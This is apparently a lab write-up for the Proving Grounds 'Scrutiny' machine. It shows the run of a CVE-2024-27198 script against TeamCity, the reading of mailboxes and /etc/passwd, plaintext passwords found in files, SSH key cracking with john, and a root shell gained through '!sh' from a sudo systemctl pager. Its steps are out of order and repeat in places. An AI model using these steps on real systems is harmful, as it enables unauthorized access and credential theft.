Target: Linux

Proving Grounds: Scrutiny

Enumeration methods are utilized to uncover potential vulnerabilities. The lab focuses on exploiting CVE-2024-27198, practicing privilege escalation, and abusing SUDO permissions for unauthorized access. This lab emphasizes understanding and exploiting vulnerabilities to enhance security awareness.

Proving GroundsAuthorized lab writeupCybersecurity portfolio

Authorized-lab note: This writeup documents activity performed exclusively in an authorized Offensive Security Proving Grounds lab. It is shared for educational and portfolio purposes.

This lab focuses on exploiting TeamCity 2023.05.4 using CVE-2024-27198 for Remote Code Execution (RCE), extracting SSH keys from Git repositories, and leveraging systemctl misconfigurations for privilege escalation.

Scenario

Enumeration methods are utilized to uncover potential vulnerabilities. The lab focuses on exploiting CVE-2024-27198, practicing privilege escalation, and abusing SUDO permissions for unauthorized access. This lab emphasizes understanding and exploiting vulnerabilities to enhance security awareness.

Learning objectives

After completion of this lab, learners will be able to:

Enumeration

This block performs reconnaissance or local enumeration. Its output is reviewed for services, files, accounts, and other leads that guide the next step.

# Run the helper or analysis script used in this lab step.

└─$ python3 CVE-2024-27198.py -t http://teams.onlyrands.com -u test123 -p test123
[+] Version Found:  2023.05.4 (build 129421)
[+] Server vulnerable, returning HTTP 200
[+] New user test123 created succesfully! Go to http://teams.onlyrands.com/login.html to login with your new credentials :)

This block performs reconnaissance or local enumeration. Its output is reviewed for services, files, accounts, and other leads that guide the next step.

## Since there was smtp port open, checking for mails

# Inspect the directory for files relevant to the next step.

marcot@onlyrands:/var/mail$ ls
bobbyp  danab  edgarm  kathleenw  marcot  matthewa  patriciam  sonjas  susanw  williamw
# Read the file contents for useful configuration or credential data.

marcot@onlyrands:/var/mail$ cat bobbyp 
cat: bobbyp: Permission denied
# Read the file contents for useful configuration or credential data.

marcot@onlyrands:/var/mail$ cat danab 
cat: danab: Permission denied
# Read the file contents for useful configuration or credential data.

marcot@onlyrands:/var/mail$ cat edgarm 
cat: edgarm: Permission denied
# Read the file contents for useful configuration or credential data.

marcot@onlyrands:/var/mail$ cat kathleenw 
cat: kathleenw: Permission denied
# Read the file contents for useful configuration or credential data.

marcot@onlyrands:/var/mail$ cat marcot 
From matthewa@onlyrands.com  Fri Jun  7 09:33:48 2024
Return-Path: <matthewa@onlyrands.com>
X-Original-To: marcot@onlyrands.com
Delivered-To: marcot@onlyrands.com
Received: by onlyrands.com (Postfix, from userid 1010)
        id E8D713650; Fri,  7 Jun 2024 09:33:48 +0000 (UTC)
From: matthewa@onlyrands.com
To: marcot@onlyrands.com
Subject: Goodbye, best friend
Date: Fri,  18 Feb 2022 08:43:11 (UTC)
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <20240607093348.E8D713650@onlyrands.com>

Marco,

Dach, the imbecile, forgot to disable my access, so you can login using my account. The password is "IdealismEngineAshen476" (without the quotation marcot).

I've left you a parting gift--your eyes only.
I'm gonna miss you, pal. Catch you on the flip side.

Sincerely,
Matthew A.

From matthewa@onlyrands.com  Fri Jun  7 09:33:48 2024
Return-Path: <matthewa@onlyrands.com>
X-Original-To: marcot@onlyrands.com
Delivered-To: marcot@onlyrands.com
Received: by onlyrands.com (Postfix, from userid 1010)
        id F07F4366A; Fri,  7 Jun 2024 09:33:48 +0000 (UTC)
From: matthewa@onlyrands.com
To: kathleenw@onlyrands.com, marcot@onlyrands.com,
    matthewa@onlyrands.com, patriciam@onlyrands.com
Subject: Goodbye!
Cc: bobbyp@onlyrands.com, danab@onlyrands.com, susanw@onlyrands.com
Date: Fri,  18 Feb 2022 08:50:03 (UTC)
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <20240607093348.F07F4366A@onlyrands.com>

Dear randos,

Like most things in life, good things must come to an end. My access has been terminated, so I thought I\'d send you this very last email to say goodbye.

You have been like a family to me for as long as I can remember, and since our we\'re not supposed to communicate outside of work, I hope that maybe one day you will remember me.

Marco, I have faith you will become an excellent leader for the team.

Take care, everyone. Goodbye!

Sincerely,
Matthew A.

From marcot@onlyrands.com  Fri Jun  7 09:33:49 2024
Return-Path: <marcot@onlyrands.com>
X-Original-To: freelancers
Delivered-To: freelancers@onlyrands.com
Received: by onlyrands.com (Postfix, from userid 1012)
        id 0555F367C; Fri,  7 Jun 2024 09:33:49 +0000 (UTC)
From: marcot@onlyrands.com
To: williamw@onlyrands.com
Subject: Welcome, new freelancer!
Cc: operations@onlyrands.com, freelancers@onlyrands.com
Date: Mon,  21 Feb 2022 09:26:56 (UTC)
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <20240607093349.0555F367C@onlyrands.com>

Hi William,

Welcome to the team. I just talked to Sonja about giving you a virtual tour of what we do at OnlyRands, so please be ready to go once Kathleen\'s given you the orientation session on how to use TeamCity.

Best,
Marco T.

From edgarm@onlyrands.com  Fri Jun  7 09:33:49 2024
Return-Path: <edgarm@onlyrands.com>
X-Original-To: marcot@onlyrands.com
Delivered-To: marcot@onlyrands.com
Received: by onlyrands.com (Postfix, from userid 1001)
        id 0D5E136A0; Fri,  7 Jun 2024 09:33:49 +0000 (UTC)
From: edgarm@onlyrands.com
To: marcot@onlyrands.com
Subject: Congratulations
Date: Mon,  21 Feb 2022 11:07:49 (UTC)
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <20240607093349.0D5E136A0@onlyrands.com>

Hi Marco,

Congratulations on your promotion to department chief. I trust you will have William W. under control, as well as your shameful numbers. Get work done.

Regards,
Macejkovic

From sonjas@onlyrands.com  Fri Jun  7 09:33:49 2024
Return-Path: <sonjas@onlyrands.com>
X-Original-To: marcot@onlyrands.com
Delivered-To: marcot@onlyrands.com
Received: by onlyrands.com (Postfix, from userid 1002)
        id 1C94636A0; Fri,  7 Jun 2024 09:33:49 +0000 (UTC)
From: sonjas@onlyrands.com
To: marcot@onlyrands.com
Subject: FIX YOUR NUMBERS
Date: Thu,  24 Feb 2022 16:24:51 (UTC)
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <20240607093349.1C94636A0@onlyrands.com>

Marco,

If you don't get those numbers up by the end of the quarter, you and your team are going to make up for it in unpaid overtime.

Regards,
Stamm

This block performs reconnaissance or local enumeration. Its output is reviewed for services, files, accounts, and other leads that guide the next step.

# Read the file contents for useful configuration or credential data.

marcot@onlyrands:/var/mail$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
offsec:x:1000:1000:,,,:/home/offsec:/bin/bash
fwupd-refresh:x:113:117:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
postfix:x:114:119::/var/spool/postfix:/usr/sbin/nologin
edgarm:x:1001:1001:Edgar Macejkovic,,,:/home/administration/edgarm:/bin/bash
sonjas:x:1002:1001:Sonja Stamm,,,:/home/administration/sonjas:/bin/bash
briand:x:1003:1001:Brian Dach,,,:/home/administration/briand:/bin/bash
bobbyp:x:1004:1002:Bobby Pfannerstill,,,:/home/operations/bobbyp:/usr/bin/bash
danab:x:1005:1002:Dana Boyer,,,:/home/operations/danab:/usr/sbin/nologin
susanw:x:1006:1002:Susan Ward,,,:/home/operations/susanw:/usr/bin/bash
dont:x:1007:1003:Don Tremblay,,,:/home/finance/dont:/usr/bin/bash
renep:x:1008:1003:Rene Price,,,:/home/finance/renep:/usr/sbin/nologin
juliuso:x:1009:1003:Julius Olson-Rogahn,,,:/home/finance/juliuso:/usr/bin/bash
matthewa:x:1010:1004:Matthew Armstrong,,,:/home/freelancers/matthewa:/usr/bin/bash
patriciam:x:1011:1004:Patricia Morissette,,,:/home/freelancers/patriciam:/usr/bin/bash
marcot:x:1012:1004:Marco Tillman,,,:/home/freelancers/marcot:/usr/bin/bash
kathleenw:x:1013:1004:Kathleen Wisoky,,,:/home/freelancers/kathleenw:/usr/bin/bash
williamw:x:1014:1004:William Walter,,,:/home/freelancers/williamw:/usr/bin/bash
git:x:1015:1005:Git Server,,,:/srv/git:/bin/bash
marcot@onlyrands:/var/mail$

This block performs reconnaissance or local enumeration. Its output is reviewed for services, files, accounts, and other leads that guide the next step.

Password: 
# Move into the directory needed for the next action.

matthewa@onlyrands:/var/mail$ cd /home/freelancers/ma
marcot/   matthewa/ 
# Move into the directory needed for the next action.

matthewa@onlyrands:/var/mail$ cd /home/freelancers/ma
marcot/   matthewa/ 
# Move into the directory needed for the next action.

matthewa@onlyrands:/var/mail$ cd /home/freelancers/matthewa/
# Inspect the directory for files relevant to the next step.

matthewa@onlyrands:~$ ls
work
# Inspect the directory for files relevant to the next step.

matthewa@onlyrands:~$ ls -al
total 44
drwxrwx---+ 3 matthewa freelancers 4096 Jun  7  2024 .
drwxrwxr-x+ 7 root     root        4096 Jun  7  2024 ..
-r--------+ 1 matthewa freelancers  120 Jun  7  2024 .~
-rw-rwxr--+ 1 matthewa freelancers  220 Jun  7  2024 .bash_logout
-rw-rwxr--+ 1 matthewa freelancers 3790 Jun  7  2024 .bashrc
-rw-rw----+ 1 matthewa freelancers  119 Jun  7  2024 .gitconfig
-rw-rwxr--+ 1 matthewa freelancers  807 Jun  7  2024 .profile
drwxrwx---+ 3 matthewa freelancers 4096 Jun  7  2024 work
matthewa@onlyrands:~$

This block performs reconnaissance or local enumeration. Its output is reviewed for services, files, accounts, and other leads that guide the next step.

# Inspect the directory for files relevant to the next step.

matthewa@onlyrands:~$ ls -al
total 44
drwxrwx---+ 3 matthewa freelancers 4096 Jun  7  2024 .
drwxrwxr-x+ 7 root     root        4096 Jun  7  2024 ..
-r--------+ 1 matthewa freelancers  120 Jun  7  2024 .~
-rw-rwxr--+ 1 matthewa freelancers  220 Jun  7  2024 .bash_logout
-rw-rwxr--+ 1 matthewa freelancers 3790 Jun  7  2024 .bashrc
-rw-rw----+ 1 matthewa freelancers  119 Jun  7  2024 .gitconfig
-rw-rwxr--+ 1 matthewa freelancers  807 Jun  7  2024 .profile
drwxrwx---+ 3 matthewa freelancers 4096 Jun  7  2024 work
# Read the file contents for useful configuration or credential data.

matthewa@onlyrands:~$ cat ./.~
Dach's password is "RefriedScabbedWasting502". I saw it once when he had to use my terminal to check TeamCity's status.
# Execute the next evidence-gathering step in the authorized lab.

matthewa@onlyrands:~$ su briand
Password: 
# Move into the directory needed for the next action.

briand@onlyrands:/home/freelancers/matthewa$ cd /home/administration/briand/
# Inspect the directory for files relevant to the next step.

briand@onlyrands:~$ ls

Initial Access

This block uses the identified entry point to obtain or validate an initial foothold. The resulting response or session confirms whether access was achieved.

# The scan output identifies the target's exposed services and their versions.

PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
25/tcp  open   smtp    Postfix smtpd
| ssl-cert: Subject: commonName=onlyrands.com
| Subject Alternative Name: DNS:onlyrands.com
| Not valid before: 2024-06-07T09:33:24
|_Not valid after:  2034-06-05T09:33:24
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: onlyrands.com, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
80/tcp  open   http    nginx 1.18.0 (Ubuntu)
|_http-title: OnlyRands
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp closed https
Service Info: Host:  onlyrands.com; OS: Linux; CPE: cpe:/o:linux:linux_kernel

This block uses the identified entry point to obtain or validate an initial foothold. The resulting response or session confirms whether access was achieved.

# Use the recovered credentials to establish a remote session.

└─$ ssh -i id_rsa macrot@192.168.170.91
hostkeys_find_by_key_hostfile: hostkeys_foreach failed for /home/kali/.ssh/known_hosts2: Permission denied
The authenticity of host '192.168.170.91 (192.168.170.91)' can't be established.
ED25519 key fingerprint is: SHA256:bdEzYRpG4k3NkIr03/E2H6ltJRUD52Zi5YA0fkNr/nY
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.170.91' (ED25519) to the list of known hosts.
'** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
macrot@192.168.170.91\'s password:

This block uses the identified entry point to obtain or validate an initial foothold. The resulting response or session confirms whether access was achieved.

## We do not have the password, lets try to crack it using ssh2john
(kali㉿kali)-[~/offsec/scrutiny]
# Execute the next evidence-gathering step in the authorized lab.

└─$ ssh2john id_rsa > sshkey
                                                                                                                   
┌──(kali㉿kali)-[~/offsec/scrutiny]
# Attempt to recover a password from the captured hash material.

└─$ john sshkey --wordlist=/usr/share/wordlists/rockyou.txt  
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cheer            (id_rsa)     
1g 0:00:00:35 DONE (2026-06-20 18:13) 0.02838g/s 33.60p/s 33.60c/s 33.60C/s 753951..mississippi
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Privilege Escalation

This block investigates or exercises a privilege-escalation path. The output is used to confirm elevated permissions or the conditions required to obtain them.

# Identify commands that can run with elevated privileges.

briand@onlyrands:~$ sudo -l
Matching Defaults entries for briand on onlyrands:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User briand may run the following commands on onlyrands:
    (root) NOPASSWD: /usr/bin/systemctl status teamcity-server.service

This block investigates or exercises a privilege-escalation path. The output is used to confirm elevated permissions or the conditions required to obtain them.

# Execute the next evidence-gathering step in the authorized lab.

briand@onlyrands:~$ sudo /usr/bin/systemctl status teamcity-server.service
● teamcity-server.service - TeamCity Server
     Loaded: loaded (/lib/systemd/system/teamcity-server.service; enabled; vendor preset: enabled)
     Active: active (running) since Tue 2024-10-22 14:32:09 UTC; 1 years 7 months ago
   Main PID: 850 (sh)
      Tasks: 153 (limit: 2255)
     Memory: 1.4G
     CGroup: /system.slice/teamcity-server.service
             ├─ 850 sh teamcity-server.sh _start_internal
             ├─ 859 sh /srv/git/software/TeamCity/bin/teamcity-server-restarter.sh run
             ├─1196 /usr/lib/jvm/java-1.11.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/srv/git/software/TeamCity/conf/logging.properties -Djava.util.l
             └─1811 /usr/lib/jvm/java-11-openjdk-amd64/bin/java -DTCSubProcessName=TeamCityMavenServer -classpath /srv/git/software/TeamCity/webapps/ROOT/WEB-INF/pl

Oct 22 14:32:09 onlyrands.com systemd[1]: Starting TeamCity Server...
Oct 22 14:32:09 onlyrands.com teamcity-server.sh[802]: Spawning TeamCity restarter in separate process
Oct 22 14:32:09 onlyrands.com teamcity-server.sh[802]: TeamCity restarter running with PID 850
Oct 22 14:32:09 onlyrands.com systemd[1]: Started TeamCity Server.
!sh
## whoami
root
## locate proof.txt
sh: 2: locate: not found
## find / -type f -iname 'local.txt' 2>/dev/null  
/srv/git/local.txt
## ind / -type f -iname 'proof.txt' 2>/dev/null
## find / -type f -iname 'proof.txt' 2>/dev/null
/root/proof.txt
## cat /srv/git/local.txt
7606bebd9bf5f6b008b18c6bc308e10a
## cat /root/proof.txt
5457aa38423c96b0b79d49fef2ba9de9
## debug2: client_check_window_change: changed
debug2: channel 0: request window-change confirm 0

Takeaways

This lab reinforced the value of methodical enumeration, evidence-driven hypothesis testing, and validating each access-control boundary in an authorized environment.